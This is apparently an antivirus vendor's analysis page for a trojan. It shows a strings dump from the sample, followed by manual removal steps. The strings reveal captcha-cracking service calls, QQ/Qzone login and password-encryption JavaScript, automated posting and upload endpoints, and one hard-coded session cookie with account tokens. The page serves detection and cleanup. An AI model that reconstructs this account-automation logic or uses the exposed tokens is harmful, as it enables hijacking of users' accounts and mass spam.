[%7lu]Packet type(%d) error(seq=%lu, cmd=%lu, srcdest=%d)
[%7lu]Get Memory Failed(seq=%lu, cmd=%lu)
[%7lu]Packet ID not found(srcdest=%d, cmdID=%d)
verify code of encrypt key error
verify code of MAC key error
Field(%s) offset(%d) is greater than data length(%d)
Decrypt field(%s) failed
Offset(%d) > Len(%d) [packect=%s, field=%s]
EncryptData error [packect=%s, field=%s]
[%7lu]Packet ID not found(PacketID=%d, cmd=%lu, srcdest=%d)
[%7lu]Session ID not found(cmd=%lu, srcdest=%d, sessionid=%d)
open.baidu.com
time.nist.gov
asia.pool.ntp.org
cn.ntp.org.cn
time.dama2.com
WSASocket Failed ,code=%d
WSACreateEvent() Failed , code=%d
Connect fail(err=%d, server=%s, port=%d, socket=%d, time=%d)
Connect server(%s:%d) success(socket=%d)
Connect server(%s:%d) failed(socket=%d, time=%d)
Connect server(%s:%d) success(socket=%d): connect return: %d
send fail(err=%d, socket=%d)
Receive fail(err=%d, socket=%d)
WSAEventSelect() Failed ,code=%d
WSAEnumNetworkEvents(%d,%d) Failed ,code=%d
events.lNetworkEvents(%d) & %d != 0 (socket=%d, err=%d)
events.lNetworkEvents & FD_CLOSE != 0 (socket=%d, err=%d)
WSAEnumNetworkEvents(%d,%d) exception ,ret=%d, lNetworkEvents=%d, LastError=%d
Synchronize time success by %s:%d
GET /special/time/ HTTP/1.0
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Host: open.baidu.com
window.baidu_time(
HTTP/
Exit %s(used %dms)
%u.%u.%u.%u
RespCode=%d(seq=%lu)
user name is empty(seq=%lu, cmd=%lu)
CrackCaptchaClient.ini
%s\%s
Software ID error(%s)
Enter %s
InnerLogin
%s login(softname=%s)
byRespCode=%d
%s logoff(softname=%s)
RegisterUser(%s) success
ReadUserInfo(%s) success
start decode: url=%s, len=%d, timeout=%d, type=%d
Internet add task failed(ProcessID=%u)
start decode: datalen=%d, ext=%s, len=%d, timeout=%d, type=%d
start GetResult: processID=%u, uTimeout=%u
GetResult Error: processID=%u
GetResult Success: processID=%u, VCode=%s, id=%u
vcode buffer len(%d) < vcode len(%d)
GetDecodeResult success(uProcessID=%d, vcodeid=%lu, VCode=%s)
ReportDecodeCorrectness success(vcodeid=%lu)
QueryUserBalance success(user=%s, balance=%d)
Recharge success(user=%s, cardno=%s)
FetchVCodeImage success(processid=%d)
ProcessID(%d) not in WorkerFetchResult
GetFetchVCodeImageResult finish(processid=%d, uVCodeID=%lu, err=%d, RespCode=%d)
RefreshVCode Reader empty(processid=%d)
RefreshVCode: Cookie is empty(processid=%d)
RefreshVCode no data(processid=%d)
RefreshVCode no data(processid=%d, file is downloading)
RollbackVCode success(count=%d)
stat buffer len(%d) <= stat info len(%d)
QueryStatistics success(stat=%s)
Get Memory Failed, BlockCount=%d
[%d]connected to server(ip=%s, port=%d)
[%d]Unpack error(seq=%lu, cmd=%lu)
[%d]received: seq=%lu, cmd=%lu, rsp=%d
[%d]RequestDecode no record: seq=%lu, cmd=%lu, rsp=%d
[%d]GetDecodeResult no ResultSeq2DecSeq: seq=%lu, cmd=%lu, rsp=%d
[%d]GetDecodeResult no record: seq=%lu, cmd=%lu, rsp=%d
[%d]SetReqSeqNoData failed(seq=%lu, cmd=%lu, rsp=%d)
[%d]Data sent(len=%d)
[%d]socket closed
CrackCaptcha.log
CrackCaptcha_bak.log
d-d-d d:d:d.d
[%d]request: seq=%lu, cmd=%lu
[%d]Pack error
[%d]Add Send Data error
Create Packet Writer failed(cmd=%lu)
socket connector connect failed(%s)
Inner login failed
server1.dama2.com
server.dama2.com
RetFileNameLen(%d) <= dwPrexLen(%d) or url(%s) not include prex
Get Var memory failed(len=%d)
SOCKFILE://%s/%s
[%d]call PacketBuiler.Pack failed(seq=%lu,cmd=%lu)
call BlockingClientSocket.Connect failed(ip=%s)
call BlockingClientSocket.Send failed(len=%d)
call BlockingClientSocket.Receive failed(recvlen=%d, left=%d)
recv data(len= %d)
Packet Length error(recvlen=%d)
call PackBuilder.Unpack failed
RespCode=%d
File Server IP error(filename=%s)
Start download file(%s)
failed to download file(%s, used %dms)
succeed to download file(%s, used %dms)
Get Var Memory failed(len=%d)
call DownloadFile(%s) failed
call FileOp.DownloadFile(%s) failed
\Install.exe
CreateFile(%s) failed(err=%d)
WriteFile(%s,len=%d) failed(err=%d)
download file from internet failed(%s)
Failed to DownloadFile(%s, resp=%d)
Picture file name Count = 0(%s)
Picture (%s) is invalid(%s)
Picture Count = 0(%s)
failed to encode dest image (%s)
Send HeatBeat init failed(resp=%d, usedtime=%dms)
Send HeatBeat failed(resp=%d, usedtime=%dms)
Send HeatBeat success(seq=%d, usedtime=%dms)
worker socket sleep timeout:%d
WSAEnumNetworkEvents(s=%d, event=%d) failed(err=%d)
close event waited[events.lNetworkEvents & FD_CLOSE)=%d, err=%d]
[%7lu]send(sock=%d, len=%d) failed(err=%d)
[%7lu]recv(sock=%d, len=%d) failed(err=%d)
OnSocketDataReceived return %d
CrackCaptchaAPI.log
CrackCaptchaAPI_bak.log
Failed to CreateFile(%s): error=%d
Failed to GetFileSize(%s): dwLen=%d
Failed to ReadFile(%s): error=%d
Failed to ReadFile(%s): Len=0
Failed to EncodeImage(%s)
C:\work\VCodeServer\Release\CrackCaptchaAPI.pdb
GetProcessHeap
KERNEL32.dll
USER32.dll
GDI32.dll
ADVAPI32.dll
InternetOpenUrlA
WININET.dll
IPHLPAPI.DLL
WS2_32.dll
GetCPInfo
PeekNamedPipe
Login2
ReportResult
zcÁ
IEC hXXp://VVV.iec.ch
.IEC 61966-2.1 Default RGB colour space - sRGB
CRT curv
.?AUILogInterface@@
.?AVCServerFileOperateThread@@
<requestedExecutionLevel level="asInvoker" uiAccess="false"></requestedExecutionLevel>
11_1j1u1
0-0}0
8'8,83888
9)9.959:9
9 :':,:\:
6v7X7\7`7
1%1S1q1
;<<0=9=?=
=#=(=5=;=
0b0%1S1
5"5*50555;5
1'252>2~2
2,2024282
4$5(5,5054585
7 7$7(7,7074787
4'44485]5
6 6$6(6,6
:(;,;0;4;
= =$=(=,=0=4=
<"<&<*<.<2<6<:<
7 7|7H7e7j7
4!5&5&6 6
< <$<(<,<0<
/Cookies.ini
/shuoshuo.ini
/YZM/1.asp
/a/shuoshuo.asp
/a/fangketiqu.asp
/a/2.asp
/a/3.asp
/a/5.asp
@Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)
http=
HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, */*
Content-Type: application/x-www-form-urlencoded
hXXp://
WinHttp.WinHttpRequest.5.1
MSXML2.ServerXMLHTTP.6.0
MSXML2.ServerXMLHTTP.5.0
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1)
Accept: image/jpeg, application/x-ms-application, image/gif, application/xaml xml, image/pjpeg, application/x-ms-xbap, application/x-shockwave-flash, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, */*
hXXps://
%S4WD
hg%fpM
S.Ac9SR
0.I%3s
,wAe.kI
aiUy'4xu
%c*@j
.eH'y
{&%U)
lj%4U
xe%CNs
9F.cLe
hJK.ZH
O.qt0
KERNEL32.DLL
COMCTL32.dll
MSIMG32.dll
MSVCRT.dll
MSVFW32.dll
SkinH_EL.dll
c:\delus.bat
RK=RIuSfMSUMX; pgv_pvi=4724880384; ptui_loginuin=595768047; pgv_pvid=8433761074; pgv_flv=11.7 r700; itkn=1899609403; ptisp=; ptcz=f4b1ea9dd4fd9cc4fff96027d95467c74c19e859473ed150c468cbcd0776a81d; pt2gguin=o0595768047; uin=o0595768047; skey=@3XHq5M5NV
hXXp://cgi.find.qq.com/qqfind/buddy/possiblev
Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022)
Accept: image/gif, image/bmp, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, */*
return binl2hex(core_md5(str2binl(A), A.length * chrsz))
return binl2str(core_md5(str2binl(A), A.length * chrsz))
for (var C = 0; C < K.length; C  = 16) {
for (var B = 0; B < D.length * chrsz; B  = chrsz) {
C[B >> 5] |= (D.charCodeAt(B / chrsz) & A) << (B % 32)
for (var B = 0; B < C.length * 32; B  = chrsz) {
D  = String.fromCharCode((C[B >> 5] >>> (B % 32)) & A)
for (var A = 0; A < C.length * 4; A  ) {
D  = B.charAt((C[A >> 2] >> ((A % 4) * 8   4)) & 15)   B.charAt((C[A >> 2] >> ((A % 4) * 8)) & 15)
for (var i = 0; i < str.length; i = i   2) {
arr.push("\\x"   str.substr(i, 2))
arr = arr.join("");
return(Math.random());
return(date.getTime());
[email protected]
hXXp://xui.ptlogin2.qq.com/cgi-bin/xlogin?proxy_url=http://qzs.qq.com/qzone/v6/portal/proxy.html&daid=5&pt_qzone_sig=1&hide_title_bar=1&low_login=0&qlogin_auto_login=1&no_verifyimg=1&link_target=blank&appid=549000912&style=22&target=self&s_url=http://qzs.qq.com/qzone/v5/loginsucc.html?para=izone&pt_qr_app=
&pt_qr_link=http://z.qzone.com/download.html&self_regurl=http://qzs.qq.com/qzone/v6/reg/index.html&pt_qr_help_link=http://z.qzone.com/download.html
login_sig:"
&u1=http://qzs.qq.com/qzone/v5/loginsucc.html?para=izone&r=
&js_type=1&login_sig=
hXXp://check.ptlogin
hXXp://captcha.qq.com/getimage?uin=
while (z   aB < aA.length) {
t  = aA.substring(z, z   aB)   '\n';
return t   aA.substring(z, aA.length)
return '0'   t.toString(16)
return t.toString(16)
if (aE < aB.length   11) {
var aA = aB.length - 1;
var aC = aB.charCodeAt(aA--);
z.nextBytes(t)
this.dmp1 = null;
this.dmq1 = null;
this.coeff = null
if (z != null && t != null && z.length > 0 && t.length > 0) {
uv_alert('Invalid RSA public key')
return t.modPowInt(this.e, this.n)
var t = af(aA, (this.n.bitLength()   7) >> 3);
var aB = this.doPublic(t);
var z = aB.toString(16);
if ((z.length & 1) == 0) {
L.prototype.doPublic = W;
L.prototype.setPublic = o;
L.prototype.encrypt = p;
this.fromNumber(z, t, aA)
this.fromString(z, 256)
this.fromString(z, t)
aE = Math.floor(aA / 67108864);
ar.prototype.am = ay;
ar.prototype.DB = aw;
ar.prototype.DM = ((1 << aw) - 1);
ar.prototype.DV = (1 << aw);
ar.prototype.FV = Math.pow(2, aa);
ar.prototype.F1 = aa - aw;
ar.prototype.F2 = 2 * aw - aa;
ap = '0'.charCodeAt(0);
ap = 'a'.charCodeAt(0);
ap = 'A'.charCodeAt(0);
return ae.charAt(t)
var aA = ag[z.charCodeAt(t)];
z.fromInt(t);
this.fromRadix(aE, z);
var aD = aE.length,
if (aE.charAt(aD) == '-') {
if (aC   aB > this.DB) {
this[this.t - 1] |= (t & ((1 << (this.DB - aC)) - 1)) << aC;
this[this.t  ] = (t >> (this.DB - aC))
if (aC >= this.DB) {
aC -= this.DB
this[this.t - 1] |= ((1 << (this.DB - aC)) - 1) << aC
this.clamp();
ar.ZERO.subTo(this, this)
var t = this.s & this.DM;
return '-'   this.negate() .toString(z)
return this.toRadix(z)
var aE = this.DB - (aB * this.DB) % aA;
if (aE < this.DB && (aF = this[aB] >> aE) > 0) {
aF |= this[--aB] >> (aE  = this.DB - aA)
aE  = this.DB;
ar.ZERO.subTo(this, t);
return (this.s < 0) ? this.negate() : this
return this.DB * (this.t - 1)   j(this[this.t - 1] ^ (this.s & this.DM))
z.t = Math.max(this.t - aA, 0);
var z = aF % this.DB;
var t = this.DB - z;
var aC = Math.floor(aF / this.DB),
aE = (this.s << z) & this.DM,
aB.clamp()
var aC = Math.floor(aE / this.DB);
var z = aE % this.DB;
t = Math.min(z.t, this.t);
aB[aA  ] = aC & this.DM;
aC >>= this.DB
aB[aA  ] = aC & this.DM;
aC >>= this.DB
aB[aA  ] = this.DV   aC
var t = this.abs(),
aC = z.abs();
aB[aA   t.t] = t.am(0, aC[aA], aB, aA, 0, t.t)
aB.clamp();
ar.ZERO.subTo(aB, aB)
var t = this.abs();
var aB = t.am(z, t[z], aA, 2 * z, 0, 1);
if ((aA[z   t.t]  = t.am(z   1, 2 * t[z], aA, 2 * z   1, aB, t.t - z - 1)) >= t.DV) {
aA[z   t.t] -= t.DV;
aA[aA.t - 1]  = t.am(z, t[z], aA, 2 * z, 0, 1)
aA.clamp()
var aO = aI.abs();
var aG = this.abs();
aF.fromInt(0)
this.copyTo(aE)
var aN = this.DB - j(aO[aO.t - 1]);
aO.lShiftTo(aN, aC);
aG.lShiftTo(aN, aE)
aO.copyTo(aC);
aG.copyTo(aE)
var aR = this.FV / aJ,
aC.dlShiftTo(aL, aD);
if (aE.compareTo(aD) >= 0) {
aE.subTo(aD, aE)
ar.ONE.dlShiftTo(aK, aD);
aD.subTo(aC, aC);
var aB = (aE[--aM] == aA) ? this.DM : Math.floor(aE[aM] * aR   (aE[aM - 1]   aP) * aQ);
if ((aE[aM]  = aC.am(0, aB, aE, aL, 0, aK)) < aB) {
aC.dlShiftTo(aL, aD);
aE.subTo(aD, aE);
aE.subTo(aD, aE)
aE.drShiftTo(aK, aF);
ar.ZERO.subTo(aF, aF)
aE.clamp();
aE.rShiftTo(aN, aE)
ar.ZERO.subTo(aE, aE)
this.abs() .divRemTo(t, null, z);
if (this.s < 0 && z.compareTo(ar.ZERO) > 0) {
t.subTo(z, z)
if (t.s < 0 || t.compareTo(this.m) >= 0) {
return t.mod(this.m)
t.divRemTo(this.m, null, t)
t.multiplyTo(aA, z);
this.reduce(z)
t.squareTo(z);
K.prototype.convert = V;
K.prototype.revert = ak;
K.prototype.reduce = J;
K.prototype.mulTo = H;
K.prototype.sqrTo = au;
z = (z * (2 - t * z % this.DV)) % this.DV;
return (z > 0) ? this.DV - z : - z
this.mp = t.invDigit();
this.mpl = this.mp & 32767;
this.mph = this.mp >> 15;
this.um = (1 << (t.DB - 15)) - 1;
this.mt2 = 2 * t.t
t.abs() .dlShiftTo(this.m.t, z);
z.divRemTo(this.m, null, z);
if (t.s < 0 && z.compareTo(ar.ZERO) > 0) {
this.m.subTo(z, z)
t.copyTo(z);
this.reduce(z);
while (t.t <= this.mt2) {
var aB = (z * this.mpl   (((z * this.mph   (t[aA] >> 15) * this.mpl) & this.um) << 15)) & t.DM;
t[z]  = this.m.am(0, aB, t, aA, 0, this.m.t);
while (t[z] >= t.DV) {
t[z] -= t.DV;
t.clamp();
t.drShiftTo(this.m.t, t);
if (t.compareTo(this.m) >= 0) {
t.subTo(this.m, t)
f.prototype.convert = aj;
f.prototype.revert = at;
f.prototype.reduce = P;
f.prototype.mulTo = y;
f.prototype.sqrTo = am;
return ar.ONE
aD = aG.convert(this),
aD.copyTo(aE);
aG.sqrTo(aE, aA);
aG.mulTo(aA, aD, aE)
return aG.revert(aE)
if (aA < 256 || t.isEven()) {
return this.exp(aA, aB)
ar.prototype.copyTo = Y;
ar.prototype.fromInt = n;
ar.prototype.fromString = w;
ar.prototype.clamp = O;
ar.prototype.dlShiftTo = aq;
ar.prototype.drShiftTo = X;
ar.prototype.lShiftTo = s;
ar.prototype.rShiftTo = l;
ar.prototype.subTo = ab;
ar.prototype.multiplyTo = D;
ar.prototype.squareTo = Q;
ar.prototype.divRemTo = E;
ar.prototype.invDigit = B;
ar.prototype.isEven = i;
ar.prototype.exp = x;
ar.prototype.toString = q;
ar.prototype.negate = R;
ar.prototype.abs = al;
ar.prototype.compareTo = G;
ar.prototype.bitLength = u;
ar.prototype.mod = N;
ar.prototype.modPowInt = an;
ar.ZERO = c(0);
ar.ONE = c(1);
d(new Date() .getTime())
m.init(U);
for (ac = 0; ac < U.length;   ac) {
return m.next()
for (t = 0; t < z.length;   t) {
ad.prototype.nextBytes = av;
z = (z   this.S[aB]   aC[aB % aC.length]) & 255;
k.prototype.init = e;
k.prototype.next = a;
t.setPublic(aA, z);
return t.encrypt(aB)
return Math.round(Math.random() * 4294967295)
for (var z = 0; z < B.length; z  ) {
var A = Number(B[z]) .toString(16);
if (A.length == 1) {
for (var y = 0; y < z.length; y  = 2) {
A  = String.fromCharCode(parseInt(z.substr(y, 2), 16))
for (var y = 0; y < A.length; y  ) {
z[y] = A.charCodeAt(y)
var y = A.length;
var y = C.length;
for (var A = 0; A < z.length; A  ) {
var y = s.length;
for (var z = 0; z < C.length; z  ) {
A[z] = C.charCodeAt(z) & 255
for (var z = 0; z < C.length; z  = 2) {
A[y  ] = parseInt(C.substr(z, 2), 16)
for (var z = 0; z < A.length; z  ) {
y  = String.fromCharCode(A[z])
return d.encode(y)
initkey: function (y, z) {
d.PADCHAR = '=';
d.ALPHA = 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789 /';
d.getbyte = function (A, z) {
var y = A.charCodeAt(z);
d.encode = function (C) {
if (arguments.length != 1) {
var z = d.PADCHAR;
var E = d.ALPHA;
var D = d.getbyte;
var A = C.length - C.length % 3;
if (C.length == 0) {
y.push(E.charAt(F >> 18));
y.push(E.charAt((F >> 12) & 63));
y.push(E.charAt((F >> 6) & 63));
y.push(E.charAt(F & 63))
switch (C.length - A) {
y.push(E.charAt(F >> 18)   E.charAt((F >> 12) & 63)   z   z);
y.push(E.charAt(F >> 18)   E.charAt((F >> 12) & 63)   E.charAt((F >> 6) & 63)   z);
return y.join('')
if (!csza.btoa) {
csza.btoa = d.encode
return binl2hex(core_md5(str2binl(s), s.length * chrsz))
return binl2str(core_md5(str2binl(s), s.length * chrsz))
function hex_hmac_md5(key, data) {
return binl2hex(core_hmac_md5(key, data))
function b64_hmac_md5(key, data) {
return binl2b64(core_hmac_md5(key, data))
function str_hmac_md5(key, data) {
return binl2str(core_hmac_md5(key, data))
for (var i = 0; i < x.length; i  = 16) {
function core_hmac_md5(key, data) {
var bkey = str2binl(key);
if (bkey.length > 16) {
bkey = core_md5(bkey, key.length * chrsz)
ipad[i] = bkey[i] ^ 909522486;
opad[i] = bkey[i] ^ 1549556828
var hash = core_md5(ipad.concat(str2binl(data)), 512   data.length * chrsz);
return core_md5(opad.concat(hash), 512   128)
for (var i = 0; i < str.length * chrsz; i  = chrsz) {
bin[i >> 5] |= (str.charCodeAt(i / chrsz) & mask) << (i % 32)
for (var i = 0; i < bin.length * 32; i  = chrsz) {
str  = String.fromCharCode((bin[i >> 5] >>> (i % 32)) & mask)
for (var i = 0; i < binarray.length * 4; i  ) {
str  = hex_tab.charAt((binarray[i >> 2] >> ((i % 4) * 8   4)) & 15)   hex_tab.charAt((binarray[i >> 2] >> ((i % 4) * 8)) & 15)
for (var i = 0; i < binarray.length * 4; i  = 3) {
if (i * 8   j * 6 > binarray.length * 32) {
str  = tab.charAt((triplet >> 6 * (3 - j)) & 63)
for (var i = 0; i < str.length; i = i   2) {
arr.push('\\x'   str.substr(i, 2))
arr = arr.join('');
var hex = str.toString(16);
var len = hex.length;
arr.push("\\x"   hex.substr(j, 2))
var result = arr.join("");
function getEncryption(password, salt, vcode, isMd5) {
password = password || '';
var md5Pwd = isMd5 ? password : md5(password),
rsaH1Len = (rsaH1.length / 2) .toString(16),
hexVcode = TEA.strToBytes(vcode.toUpperCase()),
vcodeLen = '000'   vcode.length.toString(16);
while (rsaH1Len.length < 4) {
TEA.initkey(s2);
var saltPwd = TEA.enAsBase64(rsaH1Len   rsaH1   TEA.strToBytes(salt)   vcodeLen   hexVcode);
'/': '-',
' ': '*',
'=': '_'
&pt_randsalt=0&u1=http://qzs.qq.com/qzone/v5/loginsucc.html?para=izone&ptredirect=0&h=1&t=1&g=1&from_ui=1&ptlang=2052&action=
com/login?u=
hXXp://ptlogin
function time(){return Math.random()}
function time(){return new Date().getTime()}
|*.txt
/shua/wangzhi.asp
VVV.baidu.com
&SQL=
19,91,01,22,52,07
z>&qzreferrer=http://cnc.qzs.qq.com/qzone/v6/setting/qzone/sync.html
hXXp://taotao.qq.com/cgi-bin/emotion_cgi_signset?g_tk=
hXXp://user.qzone.qq.com/
/311
&code_version=1&format=fs&qzreferrer=http://user.qzone.qq.com/
syn_tweet_verson=1¶mstr=1&pic_template=&richtype=&richval=&special_url=&subrichtype=&con=
Content-Disposition: form-data; name="skey"
skey
1.jpg
Content-Disposition: form-data; name="filename"; filename="1.jpg"
skey=
hXXp://shup.photo.qq.com/cgi-bin/upload/cgi_upload_image
&special_url=&subrichtype=1&pic_bo=
hXXp://user.qzone.qq.com/q/taotao/cgi-bin/emotion_cgi_publish_v6?g_tk=
hXXp://captcha.qq.com/getimage?aid=8000102&r=0.
/taotao&verify=
syn_tweet_verson=1¶mstr=1&pic_template=&richtype=&richval=&special_url=&subrichtype=&con=qm
hXXp://taotao.qq.com/cgi-bin/emotion_cgi_publish_v6?g_tk=
`~!@#$%^&*()-_= [{]};:'\|,<.>/?"
hXXp://VVV.baidu.com
hXXp://VVV.sogou.com
hXXp://VVV.qq.com
\fangkedl.txt
\\.\PHYSICALDRIVE
\\.\SCSI
\\.\SMARTVSD
A\\.\PhysicalDrive0
&Site=jfnn.com&Menu=yes
¸öÈËÈÕ¼Ç
VVV.dama2.com
hXXp://VVV.dama2.com
(*.bmp;*.jpg;*.gif;*.tiff)|*.bmp;*.jpg;*.gif;*.tiff
inflate 1.1.3 Copyright 1995-1998 Mark Adler
%*.*f
CNotSupportedException
commctrl_DragListMsg
Afx:%x:%x:%x:%x:%x
Afx:%x:%x
COMCTL32.DLL
CCmdTarget
__MSVCRT_HEAP_SELECT
iphlpapi.dll
SHLWAPI.dll
MPR.dll
WINMM.dll
VERSION.dll
RASAPI32.dll
WinExec
GetWindowsDirectoryA
GetKeyState
ExitWindowsEx
SetWindowsHookExA
UnhookWindowsHookEx
GetViewportOrgEx
WINSPOOL.DRV
RegCloseKey
RegOpenKeyExA
RegCreateKeyExA
ShellExecuteA
SHELL32.dll
OLEAUT32.dll
oledlg.dll
InternetCrackUrlA
InternetCanonicalizeUrlA
CreateDialogIndirectParamA
SetViewportOrgEx
OffsetViewportOrgEx
SetViewportExtEx
ScaleViewportExtEx
GetViewportExtEx
comdlg32.dll
.PAVCException@@
.PAVCNotSupportedException@@
.PAVCFileException@@
(*.prn)|*.prn|
(*.*)|*.*||
Shell32.dll
Mpr.dll
Advapi32.dll
User32.dll
Gdi32.dll
(&07-034/)7 '
?? / %d]
%d / %d]
: %d]
(*.WAV;*.MID)|*.WAV;*.MID|WAV
(*.WAV)|*.WAV|MIDI
(*.MID)|*.MID|
(*.txt)|*.txt|
(*.JPG;*.BMP;*.GIF;*.ICO;*.CUR)|*.JPG;*.BMP;*.GIF;*.ICO;*.CUR|JPG
(*.JPG)|*.JPG|BMP
(*.BMP)|*.BMP|GIF
(*.GIF)|*.GIF|
(*.ICO)|*.ICO|
(*.CUR)|*.CUR|
\\.\Scsi0:
\\.\PhysicalDrive0
%s:%d
windows
out.prn
%d.%d
%d / %d
%d/%d
(%d-%d):
VVV.dywt.com.cn
Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)
HTTP/1.0
%s <%s>
Reply-To: %s
From: %s
To: %s
Subject: %s
Date: %s
Cc: %s
%a, %d %b %Y %H:%M:%S
SMTP
(*.htm;*.html)|*.htm;*.html
msctls_hotkey32
.PAVCOleException@@
.PAVCObject@@
.PAVCSimpleException@@
.PAVCMemoryException@@
.?AVCNotSupportedException@@
.PAVCResourceException@@
.PAVCUserException@@
.?AVCCmdTarget@@
.?AVCCmdUI@@
.?AVCTestCmdUI@@
.PAVCOleDispatchException@@
.PAVCArchiveException@@
right-curly-bracket
left-curly-bracket
hXXp://VVV.12345ee.com
c:\%original file name%.exe
#include "l.chs\afxres.rc" // Standard components
mscoree.dll
- Attempt to initialize the CRT more than once.
- CRT not initialized
- floating point support not loaded
WUSER32.DLL
1.4.2.0
CrackCaptchAPI.dll
1, 0, 6, 6
- Skin.dll
(*.*)
1.0.0.0
(hXXp://VVV.eyuyan.com)

%original file name%.exe_464_rwx_10000000_0003E000:

`.rsrc
L$(h%f
SSh0j
msctls_hotkey32
TVCLHotKey
THotKey
\skinh.she
}uo,x6l5k%x-l h
9p%s m)t4`#b
e"m?c&y1`Ð<
SetViewportOrgEx
SetViewportExtEx
SetWindowsHookExA
UnhookWindowsHookEx
EnumThreadWindows
EnumChildWindows
`c%US.4/
!#$<#$#=
.text
`.rdata
@.data
.rsrc
@.UPX0
`.UPX1
`.reloc
hJK.ZH
O.qt0
KERNEL32.DLL
COMCTL32.dll
GDI32.dll
MSIMG32.dll
MSVCRT.dll
MSVFW32.dll
USER32.dll
SkinH_EL.dll
1, 0, 6, 6
- Skin.dll


Remove it with Ad-Aware

  1. Click (here) to download and install Ad-Aware Free Antivirus.
  2. Update the definition files.
  3. Run a full scan of your computer.


Manual removal*

  1. Terminate malicious process(es) (How to End a Process With the Task Manager):No processes have been created.
  2. Delete the original Trojan file.
  3. Delete or disinfect the following files created/modified by the Trojan:

    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\desktop.ini (67 bytes)
    %Documents and Settings%\%current user%\Local Settings\History\History.IE5\desktop.ini (159 bytes)
    %Documents and Settings%\%current user%\Cookies\index.dat (964 bytes)
    C:\CrackCaptchaAPI.dll (7972 bytes)
    %Documents and Settings%\%current user%\Cookies\Current_User@12345ee[1].txt (201 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\test[1].txt (1560 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\desktop.ini (67 bytes)

  4. Clean the Temporary Internet Files folder, which may contain infected files (How to clean Temporary Internet Files folder).
  5. Reboot the computer.

*Manual removal may cause unexpected system behaviour and should be performed at your own risk.

No votes yet


Lavasoft is the maker of Ad-Aware, the world's most popular anti-malware software with over 450 million downloads.
© 2026 Lavasoft. All rights reserved.
Terms Of Use |   Privacy Policy


x

Our best antivirus yet!

Fresh new look. Faster scanning. Better protection.

Enjoy unique new features, lightning fast scans and a simple yet beautiful new look in our best antivirus yet!

For a quicker, lighter and more secure experience, download the all new adaware antivirus 12 now!

Download adaware antivirus 12
No thanks, continue to lavasoft.com
close x

Discover the new adaware antivirus 12

Our best antivirus yet

Download Now